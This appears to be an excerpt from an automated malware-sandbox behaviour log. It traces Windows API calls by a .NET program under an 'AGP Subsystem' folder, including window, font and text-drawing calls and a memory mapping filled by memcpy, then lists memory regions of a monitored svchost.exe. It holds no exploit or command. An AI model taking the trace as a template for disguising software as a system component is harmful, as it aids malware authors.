[0269.523] CreateWindowExW (dwExStyle=0x0, lpClassName=".NET-BroadcastEventWindow.4.0.0.0.141b42a.0", lpWindowName=".NET-BroadcastEventWindow.4.0.0.0.141b42a.0", dwStyle=0x80000000, X=0, Y=0, nWidth=0, nHeight=0, hWndParent=0x0, hMenu=0x0, hInstance=0xee0000, lpParam=0x0) returned 0x10158
[0269.523] NtdllDefWindowProc_W () returned 0x1
[0269.524] NtdllDefWindowProc_W () returned 0x0
[0269.524] NtdllDefWindowProc_W () returned 0x0
[0269.524] NtdllDefWindowProc_W () returned 0x0
[0269.524] NtdllDefWindowProc_W () returned 0x0
[0269.528] GetSysColor (nIndex=10) returned 0xb4b4b4
[0269.528] GetSysColor (nIndex=2) returned 0xd1b499
[0269.528] GetSysColor (nIndex=9) returned 0x0
[0269.529] GetSysColor (nIndex=12) returned 0xababab
[0269.529] GetSysColor (nIndex=15) returned 0xf0f0f0
[0269.529] GetSysColor (nIndex=20) returned 0xffffff
[0269.529] GetSysColor (nIndex=16) returned 0xa0a0a0
[0269.529] GetSysColor (nIndex=15) returned 0xf0f0f0
[0269.529] GetSysColor (nIndex=16) returned 0xa0a0a0
[0269.529] GetSysColor (nIndex=21) returned 0x696969
[0269.529] GetSysColor (nIndex=22) returned 0xe3e3e3
[0269.529] GetSysColor (nIndex=20) returned 0xffffff
[0269.529] GetSysColor (nIndex=18) returned 0x0
[0269.529] GetSysColor (nIndex=1) returned 0x0
[0269.529] GetSysColor (nIndex=27) returned 0xead1b9
[0269.529] GetSysColor (nIndex=28) returned 0xf2e4d7
[0269.529] GetSysColor (nIndex=17) returned 0x6d6d6d
[0269.529] GetSysColor (nIndex=13) returned 0xff9933
[0269.529] GetSysColor (nIndex=14) returned 0xffffff
[0269.529] GetSysColor (nIndex=26) returned 0xcc6600
[0269.529] GetSysColor (nIndex=11) returned 0xfcf7f4
[0269.530] GetSysColor (nIndex=3) returned 0xdbcdbf
[0269.530] GetSysColor (nIndex=19) returned 0x544e43
[0269.530] GetSysColor (nIndex=24) returned 0xe1ffff
[0269.530] GetSysColor (nIndex=23) returned 0x0
[0269.530] GetSysColor (nIndex=4) returned 0xf0f0f0
[0269.530] GetSysColor (nIndex=30) returned 0xf0f0f0
[0269.530] GetSysColor (nIndex=29) returned 0xff9933
[0269.530] GetSysColor (nIndex=7) returned 0x0
[0269.530] GetSysColor (nIndex=0) returned 0xc8c8c8
[0269.530] GetSysColor (nIndex=5) returned 0xffffff
[0269.530] GetSysColor (nIndex=6) returned 0x646464
[0269.530] GetSysColor (nIndex=8) returned 0x0
[0269.530] AdjustWindowRectEx (in: lpRect=0x38ed38, dwStyle=0x56000000, bMenu=0, dwExStyle=0x10000 | out: lpRect=0x38ed38) returned 1
[0269.533] AdjustWindowRectEx (in: lpRect=0x38ed38, dwStyle=0x5601000b, bMenu=0, dwExStyle=0x0 | out: lpRect=0x38ed38) returned 1
[0269.533] AdjustWindowRectEx (in: lpRect=0x38ed38, dwStyle=0x5601000b, bMenu=0, dwExStyle=0x0 | out: lpRect=0x38ed38) returned 1
[0269.538] AdjustWindowRectEx (in: lpRect=0x38ed38, dwStyle=0x5601000b, bMenu=0, dwExStyle=0x0 | out: lpRect=0x38ed38) returned 1
[0269.538] AdjustWindowRectEx (in: lpRect=0x38ed38, dwStyle=0x5601000b, bMenu=0, dwExStyle=0x0 | out: lpRect=0x38ed38) returned 1
[0269.538] AdjustWindowRectEx (in: lpRect=0x38ed38, dwStyle=0x5601000b, bMenu=0, dwExStyle=0x0 | out: lpRect=0x38ed38) returned 1
[0269.538] AdjustWindowRectEx (in: lpRect=0x38ed38, dwStyle=0x5601000b, bMenu=0, dwExStyle=0x0 | out: lpRect=0x38ed38) returned 1
[0269.539] AdjustWindowRectEx (in: lpRect=0x38ed38, dwStyle=0x5601000b, bMenu=0, dwExStyle=0x0 | out: lpRect=0x38ed38) returned 1
[0269.539] AdjustWindowRectEx (in: lpRect=0x38ed38, dwStyle=0x5601000b, bMenu=0, dwExStyle=0x0 | out: lpRect=0x38ed38) returned 1
[0269.539] AdjustWindowRectEx (in: lpRect=0x38ed38, dwStyle=0x5601000b, bMenu=0, dwExStyle=0x0 | out: lpRect=0x38ed38) returned 1
[0269.539] AdjustWindowRectEx (in: lpRect=0x38ed38, dwStyle=0x5601000b, bMenu=0, dwExStyle=0x0 | out: lpRect=0x38ed38) returned 1
[0269.540] GetCurrentThreadId () returned 0x730
[0269.540] GetCurrentThreadId () returned 0x730
[0269.540] GetCurrentThreadId () returned 0x730
[0269.540] GetCurrentThreadId () returned 0x730
[0269.540] AdjustWindowRectEx (in: lpRect=0x38ed38, dwStyle=0x56000000, bMenu=0, dwExStyle=0x10000 | out: lpRect=0x38ed38) returned 1
[0269.540] AdjustWindowRectEx (in: lpRect=0x38ed38, dwStyle=0x56000000, bMenu=0, dwExStyle=0x10000 | out: lpRect=0x38ed38) returned 1
[0269.543] AdjustWindowRectEx (in: lpRect=0x38ebe8, dwStyle=0x5600000d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x38ebe8) returned 1
[0269.544] GdipGetFamilyName (in: family=0x4ef358, name=0x38ebb0, language=0x409 | out: name="Microsoft Sans Serif") returned 0x0
[0269.546] CreateCompatibleDC (hdc=0x0) returned 0x2901022d
[0269.547] GetCurrentObject (hdc=0x2901022d, type=0x1) returned 0x1b00017
[0269.547] GetCurrentObject (hdc=0x2901022d, type=0x2) returned 0x1900010
[0269.547] GetCurrentObject (hdc=0x2901022d, type=0x7) returned 0x185000f
[0269.548] GetCurrentObject (hdc=0x2901022d, type=0x6) returned 0x18a002e
[0269.550] SaveDC (hdc=0x2901022d) returned 1
[0269.551] GetDeviceCaps (hdc=0x2901022d, index=90) returned 96
[0269.553] CoTaskMemAlloc (cb=0x5c) returned 0x76e6f8
[0269.553] CreateFontIndirectW (lplf=0x76e6f8) returned 0x1f0a0217
[0269.554] CoTaskMemFree (pv=0x76e6f8)
[0269.554] GetObjectW (in: h=0x1f0a0217, c=92, pv=0x38eb74 | out: pv=0x38eb74) returned 92
[0269.559] GetCurrentObject (hdc=0x2901022d, type=0x6) returned 0x18a002e
[0269.559] GetObjectW (in: h=0x18a002e, c=92, pv=0x38eb64 | out: pv=0x38eb64) returned 92
[0269.560] SelectObject (hdc=0x2901022d, h=0x1f0a0217) returned 0x18a002e
[0269.563] GetTextExtentPoint32W (in: hdc=0x2901022d, lpString="0", c=1, psizl=0x23ff85c | out: psizl=0x23ff85c) returned 1
[0269.569] AdjustWindowRectEx (in: lpRect=0x38ecc0, dwStyle=0x5600000d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x38ecc0) returned 1
[0269.571] GdipCreateFontFamilyFromName (name="Arial", fontCollection=0x0, fontFamily=0x38ed88) returned 0x0
[0269.572] GdipCreateFont (fontFamily=0x48fb598, emSize=0x417c0000, style=1, unit=0x3, font=0x23ff950) returned 0x0
[0269.656] GdipGetFontSize (font=0x4e2230, size=0x23ff954) returned 0x0
[0269.657] AdjustWindowRectEx (in: lpRect=0x38eba0, dwStyle=0x5600000d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x38eba0) returned 1
[0269.657] GdipGetFamilyName (in: family=0x48fb598, name=0x38eb68, language=0x409 | out: name="Arial") returned 0x0
[0269.669] GetDeviceCaps (hdc=0x2901022d, index=90) returned 96
[0269.669] CoTaskMemAlloc (cb=0x5c) returned 0x76e6f8
[0269.669] CreateFontIndirectW (lplf=0x76e6f8) returned 0x200a0240
[0269.669] CoTaskMemFree (pv=0x76e6f8)
[0269.669] GetObjectW (in: h=0x200a0240, c=92, pv=0x38eb2c | out: pv=0x38eb2c) returned 92
[0269.669] SelectObject (hdc=0x2901022d, h=0x200a0240) returned 0x1f0a0217
[0269.674] DeleteObject (ho=0x1f0a0217) returned 1
[0269.674] GetTextExtentPoint32W (in: hdc=0x2901022d, lpString="0", c=1, psizl=0x23ffc04 | out: psizl=0x23ffc04) returned 1
[0269.678] AdjustWindowRectEx (in: lpRect=0x38ec78, dwStyle=0x5600000d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x38ec78) returned 1
[0269.678] AdjustWindowRectEx (in: lpRect=0x38ebd4, dwStyle=0x5600000d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x38ebd4) returned 1
[0269.678] GdipGetFamilyName (in: family=0x48fb598, name=0x38eb9c, language=0x409 | out: name="Arial") returned 0x0
[0269.679] GetDeviceCaps (hdc=0x2901022d, index=90) returned 96
[0269.679] CoTaskMemAlloc (cb=0x5c) returned 0x76e6f8
[0269.679] CreateFontIndirectW (lplf=0x76e6f8) returned 0x200a0217
[0269.679] CoTaskMemFree (pv=0x76e6f8)
[0269.679] GetObjectW (in: h=0x200a0217, c=92, pv=0x38eb60 | out: pv=0x38eb60) returned 92
[0269.681] GetTextExtentPoint32W (in: hdc=0x2901022d, lpString="0", c=1, psizl=0x23ffdfc | out: psizl=0x23ffdfc) returned 1
[0269.682] DeleteObject (ho=0x200a0217) returned 1
[0269.682] AdjustWindowRectEx (in: lpRect=0x38ed0c, dwStyle=0x5600000d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x38ed0c) returned 1
[0269.682] AdjustWindowRectEx (in: lpRect=0x38ebd4, dwStyle=0x5600000d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x38ebd4) returned 1
[0269.682] GdipGetFamilyName (in: family=0x48fb598, name=0x38eb9c, language=0x409 | out: name="Arial") returned 0x0
[0269.682] GetDeviceCaps (hdc=0x2901022d, index=90) returned 96
[0269.682] CoTaskMemAlloc (cb=0x5c) returned 0x76e6f8
[0269.682] CreateFontIndirectW (lplf=0x76e6f8) returned 0x210a0217
[0269.683] CoTaskMemFree (pv=0x76e6f8)
[0269.683] GetObjectW (in: h=0x210a0217, c=92, pv=0x38eb60 | out: pv=0x38eb60) returned 92
[0269.683] GetTextExtentPoint32W (in: hdc=0x2901022d, lpString="0", c=1, psizl=0x23ffffc | out: psizl=0x23ffffc) returned 1
[0269.683] DeleteObject (ho=0x210a0217) returned 1
[0269.684] AdjustWindowRectEx (in: lpRect=0x38ebac, dwStyle=0x5600000d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x38ebac) returned 1
[0269.689] GdipGetFamilyName (in: family=0x48fb598, name=0x38ea98, language=0x409 | out: name="Arial") returned 0x0
[0269.690] GetDeviceCaps (hdc=0x2901022d, index=90) returned 96
[0269.690] CoTaskMemAlloc (cb=0x5c) returned 0x76e6f8
[0269.690] CreateFontIndirectW (lplf=0x76e6f8) returned 0x220a0217
[0269.690] CoTaskMemFree (pv=0x76e6f8)
[0269.690] GetObjectW (in: h=0x220a0217, c=92, pv=0x38ea5c | out: pv=0x38ea5c) returned 92
[0269.692] GetMapMode (hdc=0x2901022d) returned 1
[0269.693] GetTextMetricsW (in: hdc=0x2901022d, lptm=0x38ea8c | out: lptm=0x38ea8c) returned 1
[0269.694] DrawTextExW (in: hdc=0x2901022d, lpchText="Chipu and Co.", cchText=13, lprc=0x38eb98, format=0x2400, lpdtp=0x24002a0 | out: lpchText="Chipu and Co.", lprc=0x38eb98) returned 24
[0269.742] AdjustWindowRectEx (in: lpRect=0x38ec84, dwStyle=0x5600000d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x38ec84) returned 1
[0269.764] AdjustWindowRectEx (in: lpRect=0x38ebe8, dwStyle=0x5600000d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x38ebe8) returned 1
[0269.764] GdipGetFamilyName (in: family=0x4ef358, name=0x38ebb0, language=0x409 | out: name="Microsoft Sans Serif") returned 0x0
[0269.764] GetDeviceCaps (hdc=0x2901022d, index=90) returned 96
[0269.764] CoTaskMemAlloc (cb=0x5c) returned 0x76e6f8
[0269.764] CreateFontIndirectW (lplf=0x76e6f8) returned 0x1d0a021d
[0269.764] CoTaskMemFree (pv=0x76e6f8)
[0269.764] GetObjectW (in: h=0x1d0a021d, c=92, pv=0x38eb74 | out: pv=0x38eb74) returned 92
[0269.764] SelectObject (hdc=0x2901022d, h=0x1d0a021d) returned 0x200a0240
[0269.765] DeleteObject (ho=0x200a0240) returned 1
[0269.765] GetTextExtentPoint32W (in: hdc=0x2901022d, lpString="0", c=1, psizl=0x2401544 | out: psizl=0x2401544) returned 1
[0269.765] AdjustWindowRectEx (in: lpRect=0x38ecc0, dwStyle=0x5600000d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x38ecc0) returned 1
[0269.765] GdipCreateFontFamilyFromName (name="Arial", fontCollection=0x0, fontFamily=0x38ed88) returned 0x0
[0269.766] GdipCreateFont (fontFamily=0x48fb598, emSize=0x417c0000, style=1, unit=0x3, font=0x2401664) returned 0x0
[0269.766] GdipGetFontSize (font=0x49402b8, size=0x2401668) returned 0x0
[0269.766] AdjustWindowRectEx (in: lpRect=0x38eba0, dwStyle=0x5600000d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x38eba0) returned 1
[0269.766] GdipGetFamilyName (in: family=0x48fb598, name=0x38eb68, language=0x409 | out: name="Arial") returned 0x0
[0269.766] GetDeviceCaps (hdc=0x2901022d, index=90) returned 96
[0269.766] CoTaskMemAlloc (cb=0x5c) returned 0x76e6f8
[0269.767] CreateFontIndirectW (lplf=0x76e6f8) returned 0x210a0240
[0269.767] CoTaskMemFree (pv=0x76e6f8)
[0269.767] GetObjectW (in: h=0x210a0240, c=92, pv=0x38eb2c | out: pv=0x38eb2c) returned 92
[0269.767] SelectObject (hdc=0x2901022d, h=0x210a0240) returned 0x1d0a021d
[0269.767] DeleteObject (ho=0x1d0a021d) returned 1
[0269.767] GetTextExtentPoint32W (in: hdc=0x2901022d, lpString="0", c=1, psizl=0x24018d0 | out: psizl=0x24018d0) returned 1
[0269.767] AdjustWindowRectEx (in: lpRect=0x38ec78, dwStyle=0x5600000d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x38ec78) returned 1
[0269.767] AdjustWindowRectEx (in: lpRect=0x38ebd4, dwStyle=0x5600000d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x38ebd4) returned 1
[0269.767] GdipGetFamilyName (in: family=0x48fb598, name=0x38eb9c, language=0x409 | out: name="Arial") returned 0x0
[0269.768] GetDeviceCaps (hdc=0x2901022d, index=90) returned 96
[0269.768] CoTaskMemAlloc (cb=0x5c) returned 0x76e6f8
[0269.768] CreateFontIndirectW (lplf=0x76e6f8) returned 0x1e0a021d
[0269.768] CoTaskMemFree (pv=0x76e6f8)
[0269.768] GetObjectW (in: h=0x1e0a021d, c=92, pv=0x38eb60 | out: pv=0x38eb60) returned 92
[0269.768] GetTextExtentPoint32W (in: hdc=0x2901022d, lpString="0", c=1, psizl=0x2401ac8 | out: psizl=0x2401ac8) returned 1
[0269.768] DeleteObject (ho=0x1e0a021d) returned 1
[0269.768] AdjustWindowRectEx (in: lpRect=0x38ed0c, dwStyle=0x5600000d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x38ed0c) returned 1
[0269.769] AdjustWindowRectEx (in: lpRect=0x38ebd4, dwStyle=0x5600000d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x38ebd4) returned 1
[0269.769] GdipGetFamilyName (in: family=0x48fb598, name=0x38eb9c, language=0x409 | out: name="Arial") returned 0x0
[0269.769] GetDeviceCaps (hdc=0x2901022d, index=90) returned 96
[0269.769] CoTaskMemAlloc (cb=0x5c) returned 0x76e6f8
[0269.769] CreateFontIndirectW (lplf=0x76e6f8) returned 0x1f0a021d
[0269.769] CoTaskMemFree (pv=0x76e6f8)
[0269.769] GetObjectW (in: h=0x1f0a021d, c=92, pv=0x38eb60 | out: pv=0x38eb60) returned 92
[0269.769] GetTextExtentPoint32W (in: hdc=0x2901022d, lpString="0", c=1, psizl=0x2401cbc | out: psizl=0x2401cbc) returned 1
[0269.769] DeleteObject (ho=0x1f0a021d) returned 1
[0269.769] AdjustWindowRectEx (in: lpRect=0x38ebac, dwStyle=0x5600000d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x38ebac) returned 1
[0269.770] DrawTextExW (in: hdc=0x2901022d, lpchText="LMS", cchText=3, lprc=0x38eb98, format=0x2400, lpdtp=0x2401d48 | out: lpchText="LMS", lprc=0x38eb98) returned 24
[0269.770] AdjustWindowRectEx (in: lpRect=0x38ec84, dwStyle=0x5600000d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x38ec84) returned 1
[0269.770] AdjustWindowRectEx (in: lpRect=0x38ed38, dwStyle=0x56000000, bMenu=0, dwExStyle=0x10000 | out: lpRect=0x38ed38) returned 1
[0269.770] AdjustWindowRectEx (in: lpRect=0x38ed38, dwStyle=0x56000000, bMenu=0, dwExStyle=0x10000 | out: lpRect=0x38ed38) returned 1
[0269.772] AdjustWindowRectEx (in: lpRect=0x38ed6c, dwStyle=0x2cf0000, bMenu=0, dwExStyle=0x50000 | out: lpRect=0x38ed6c) returned 1
[0269.772] GetSystemMetrics (nIndex=59) returned 1460
[0269.772] GetSystemMetrics (nIndex=60) returned 920
[0269.772] GetSystemMetrics (nIndex=34) returned 132
[0269.772] GetSystemMetrics (nIndex=35) returned 38
[0269.772] AdjustWindowRectEx (in: lpRect=0x38ec6c, dwStyle=0x2cf0000, bMenu=0, dwExStyle=0x50000 | out: lpRect=0x38ec6c) returned 1
[0269.772] GetCurrentThreadId () returned 0x730
[0269.772] GetCurrentThreadId () returned 0x730
[0269.773] GetCurrentThreadId () returned 0x730
[0269.773] GetCurrentThreadId () returned 0x730
[0269.773] GetCurrentThreadId () returned 0x730
[0269.773] GetCurrentThreadId () returned 0x730
[0269.776] CreateCompatibleDC (hdc=0x0) returned 0x2001021d
[0269.777] GetDC (hWnd=0x0) returned 0x70101c6
[0269.777] GdipCreateFromHDC (hdc=0x70101c6, graphics=0x38eba8) returned 0x0
[0269.778] CoTaskMemAlloc (cb=0x5c) returned 0x76e6f8
[0269.778] GdipGetLogFontW (font=0x4940960, graphics=0x4f83340, logfontW=0x76e6f8) returned 0x0
[0269.778] CoTaskMemFree (pv=0x76e6f8)
[0269.778] CoTaskMemAlloc (cb=0x5c) returned 0x76e6f8
[0269.778] CoTaskMemFree (pv=0x76e6f8)
[0269.779] CoTaskMemAlloc (cb=0x5c) returned 0x76e6f8
[0269.779] CoTaskMemFree (pv=0x76e6f8)
[0269.779] GdipDeleteGraphics (graphics=0x4f83340) returned 0x0
[0269.779] ReleaseDC (hWnd=0x0, hDC=0x70101c6) returned 1
[0269.779] CoTaskMemAlloc (cb=0x5c) returned 0x76e6f8
[0269.779] CreateFontIndirectW (lplf=0x76e6f8) returned 0x140a0215
[0269.779] CoTaskMemFree (pv=0x76e6f8)
[0269.780] SelectObject (hdc=0x2001021d, h=0x140a0215) returned 0x18a002e
[0269.780] GetTextMetricsW (in: hdc=0x2001021d, lptm=0x38ecb4 | out: lptm=0x38ecb4) returned 1
[0269.780] GetTextExtentPoint32W (in: hdc=0x2001021d, lpString="abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ", c=52, psizl=0x2402214 | out: psizl=0x2402214) returned 1
[0269.780] SelectObject (hdc=0x2001021d, h=0x18a002e) returned 0x140a0215
[0269.781] DeleteDC (hdc=0x2001021d) returned 1
[0269.781] AdjustWindowRectEx (in: lpRect=0x38ec94, dwStyle=0x56000000, bMenu=0, dwExStyle=0x10000 | out: lpRect=0x38ec94) returned 1
[0269.781] AdjustWindowRectEx (in: lpRect=0x38eaf8, dwStyle=0x56000000, bMenu=0, dwExStyle=0x10000 | out: lpRect=0x38eaf8) returned 1
[0269.781] AdjustWindowRectEx (in: lpRect=0x38ec58, dwStyle=0x5601000b, bMenu=0, dwExStyle=0x0 | out: lpRect=0x38ec58) returned 1
[0269.781] AdjustWindowRectEx (in: lpRect=0x38eabc, dwStyle=0x5601000b, bMenu=0, dwExStyle=0x0 | out: lpRect=0x38eabc) returned 1
[0269.781] AdjustWindowRectEx (in: lpRect=0x38ec58, dwStyle=0x5601000b, bMenu=0, dwExStyle=0x0 | out: lpRect=0x38ec58) returned 1
[0269.781] AdjustWindowRectEx (in: lpRect=0x38eabc, dwStyle=0x5601000b, bMenu=0, dwExStyle=0x0 | out: lpRect=0x38eabc) returned 1
[0269.781] AdjustWindowRectEx (in: lpRect=0x38ec58, dwStyle=0x5601000b, bMenu=0, dwExStyle=0x0 | out: lpRect=0x38ec58) returned 1
[0269.782] AdjustWindowRectEx (in: lpRect=0x38eabc, dwStyle=0x5601000b, bMenu=0, dwExStyle=0x0 | out: lpRect=0x38eabc) returned 1
[0269.782] AdjustWindowRectEx (in: lpRect=0x38ec58, dwStyle=0x5601000b, bMenu=0, dwExStyle=0x0 | out: lpRect=0x38ec58) returned 1
[0269.782] AdjustWindowRectEx (in: lpRect=0x38eabc, dwStyle=0x5601000b, bMenu=0, dwExStyle=0x0 | out: lpRect=0x38eabc) returned 1
[0269.782] AdjustWindowRectEx (in: lpRect=0x38ec58, dwStyle=0x5601000b, bMenu=0, dwExStyle=0x0 | out: lpRect=0x38ec58) returned 1
[0269.782] AdjustWindowRectEx (in: lpRect=0x38eabc, dwStyle=0x5601000b, bMenu=0, dwExStyle=0x0 | out: lpRect=0x38eabc) returned 1
[0269.782] AdjustWindowRectEx (in: lpRect=0x38ec94, dwStyle=0x56000000, bMenu=0, dwExStyle=0x10000 | out: lpRect=0x38ec94) returned 1
[0269.782] AdjustWindowRectEx (in: lpRect=0x38eaf8, dwStyle=0x56000000, bMenu=0, dwExStyle=0x10000 | out: lpRect=0x38eaf8) returned 1
[0269.782] AdjustWindowRectEx (in: lpRect=0x38ec58, dwStyle=0x5600000d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x38ec58) returned 1
[0269.782] AdjustWindowRectEx (in: lpRect=0x38eabc, dwStyle=0x5600000d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x38eabc) returned 1
[0269.782] AdjustWindowRectEx (in: lpRect=0x38e914, dwStyle=0x5600000d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x38e914) returned 1
[0269.782] AdjustWindowRectEx (in: lpRect=0x38ec58, dwStyle=0x5600000d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x38ec58) returned 1
[0269.782] AdjustWindowRectEx (in: lpRect=0x38eabc, dwStyle=0x5600000d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x38eabc) returned 1
[0269.782] AdjustWindowRectEx (in: lpRect=0x38e914, dwStyle=0x5600000d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x38e914) returned 1
[0269.784] AdjustWindowRectEx (in: lpRect=0x38ea08, dwStyle=0x2cf0000, bMenu=0, dwExStyle=0x50000 | out: lpRect=0x38ea08) returned 1
[0269.784] AdjustWindowRectEx (in: lpRect=0x38ec2c, dwStyle=0x2cf0000, bMenu=0, dwExStyle=0x50000 | out: lpRect=0x38ec2c) returned 1
[0269.784] AdjustWindowRectEx (in: lpRect=0x38e980, dwStyle=0x2cf0000, bMenu=0, dwExStyle=0x50000 | out: lpRect=0x38e980) returned 1
[0269.784] AdjustWindowRectEx (in: lpRect=0x38ea64, dwStyle=0x2cf0000, bMenu=0, dwExStyle=0x50000 | out: lpRect=0x38ea64) returned 1
[0269.784] GetSystemMetrics (nIndex=34) returned 132
[0269.784] GetSystemMetrics (nIndex=35) returned 38
[0269.784] AdjustWindowRectEx (in: lpRect=0x38ebec, dwStyle=0x56000000, bMenu=0, dwExStyle=0x10000 | out: lpRect=0x38ebec) returned 1
[0269.784] AdjustWindowRectEx (in: lpRect=0x38ea50, dwStyle=0x56000000, bMenu=0, dwExStyle=0x10000 | out: lpRect=0x38ea50) returned 1
[0269.850] EtwEventRegister () returned 0x0
[0269.858] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\AGP Subsystem\\agpss.exe.config", nBufferLength=0x105, lpBuffer=0x38e5b0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\AGP Subsystem\\agpss.exe.config", lpFilePart=0x0) returned 0x35
[0269.859] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x38e7f8) returned 1
[0269.859] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\AGP Subsystem\\agpss.exe.config" (normalized: "c:\\program files (x86)\\agp subsystem\\agpss.exe.config"), fInfoLevelId=0x0, lpFileInformation=0x38eabc | out: lpFileInformation=0x38eabc*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
[0269.859] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x38e7f4) returned 1
[0271.480] CreateFileMappingW (hFile=0xffffffff, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xfa00, lpName=0x0) returned 0x24c
[0271.480] memcpy (in: _Dst=0x470000, _Src=0x24151dc, _Size=0xfa00 | out: _Dst=0x470000) returned 0x470000
[0271.481] CloseHandle (hObject=0x24c) returned 1
Thread:
id = 91
os_tid = 0x764
Thread:
id = 92
os_tid = 0x76c
[0263.303] CoGetContextToken (in: pToken=0x44ff63c | out: pToken=0x44ff63c) returned 0x800401f0
[0263.305] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
Thread:
id = 93
os_tid = 0x778
Thread:
id = 122
os_tid = 0x618
Thread:
id = 123
os_tid = 0x678
Thread:
id = 130
os_tid = 0x714
Thread:
id = 131
os_tid = 0x6d0
Process:
id = "11"
image_name = "svchost.exe"
filename = "c:\\windows\\system32\\svchost.exe"
page_root = "0x26e78000"
os_pid = "0x234"
os_integrity_level = "0x4000"
os_privileges = "0x60b00080"
monitor_reason = "rpc_server"
parent_id = "9"
os_parent_pid = "0x1c8"
cmd_line = "C:\\Windows\\system32\\svchost.exe -k DcomLaunch"
cur_dir = "C:\\Windows\\system32\\"
os_username = "NT AUTHORITY\\SYSTEM"
bitness = "32"
os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\DcomLaunch" [0xa], "NT SERVICE\\PlugPlay" [0xe], "NT SERVICE\\Power" [0xa], "NT AUTHORITY\\Logon Session 00000000:00007683" [0xc000000f], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe]
Region:
id = 2986
start_va = 0x10000
end_va = 0x1ffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000010000"
filename = ""
Region:
id = 2987
start_va = 0x20000
end_va = 0x20fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "svchost.exe.mui"
filename = "\\Windows\\System32\\en-US\\svchost.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\svchost.exe.mui")
Region:
id = 2988
start_va = 0x30000
end_va = 0x33fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000030000"
filename = ""
Region:
id = 2989
start_va = 0x40000
end_va = 0x40fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000040000"
filename = ""
Region:
id = 2990
start_va = 0x50000
end_va = 0xb6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "locale.nls"
filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls")
Region:
id = 2991
start_va = 0xc0000
end_va = 0xc0fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000000c0000"
filename = ""
Region:
id = 2992
start_va = 0xd0000
end_va = 0xd0fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000000d0000"
filename = ""
Region:
id = 2993
start_va = 0xe0000
end_va = 0xecfff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "setupapi.dll.mui"
filename = "\\Windows\\System32\\en-US\\setupapi.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\setupapi.dll.mui")
Region:
id = 2994
start_va = 0xf0000
end_va = 0xf0fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000000f0000"
filename = ""
Region:
id = 2995
start_va = 0x100000
end_va = 0x100fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000100000"
filename = ""
Region:
id = 2996
start_va = 0x110000
end_va = 0x11ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000110000"
filename = ""
Region:
id = 2997
start_va = 0x120000
end_va = 0x120fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000120000"
filename = ""
Region:
id = 2998
start_va = 0x130000
end_va = 0x130fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000130000"
filename = ""
Region:
id = 2999
start_va = 0x140000
end_va = 0x14ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000140000"
filename = ""
Region:
id = 3000
start_va = 0x150000
end_va = 0x1cffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000150000"
filename = ""
Region:
id = 3001
start_va = 0x1d0000
end_va = 0x1d0fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000001d0000"
filename = ""
Region:
id = 3002
start_va = 0x1f0000
end_va = 0x26ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000001f0000"
filename = ""
Region:
id = 3003
start_va = 0x270000
end_va = 0x36ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000270000"
filename = ""
